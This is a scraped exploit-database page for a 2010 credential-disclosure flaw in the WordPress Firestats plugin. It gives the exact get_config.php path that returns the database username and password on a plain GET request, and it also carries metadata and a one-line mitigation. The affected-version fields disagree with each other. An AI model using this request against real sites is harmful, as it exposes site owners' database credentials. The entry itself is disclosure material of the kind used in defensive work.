Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Wordpress firestats remote configuration file download - exploit.company
header-logo
Suggest Exploit
vendor:
Firestats
by:
Jelmer de Hen
5.5
CVSS
MEDIUM
Remote Configuration File Download
200
CWE
Product Name: Firestats
Affected Version From: 1.6.2005
Affected Version To: 1.6.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

WordPress firestats remote configuration file download

A vulnerability in the Firestats plugin for Wordpress allows an attacker to download the configuration file, which contains sensitive information such as the database username and password.

Mitigation:

Update to the latest version of Firestats plugin and ensure proper access controls are in place for sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress firestats remote configuration file download

# Date: 2010-07-09
# Author: Jelmer de Hen
# Software Link: http://firestats.cc/
# Version: 1.6.5
# Tested on: PHP Do a simple GET request to this file:

/wp-content/plugins/firestats/php/tools/get_config.php

This will allow you to download a configuration file which contains the database username and password.
		 	   		  
http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html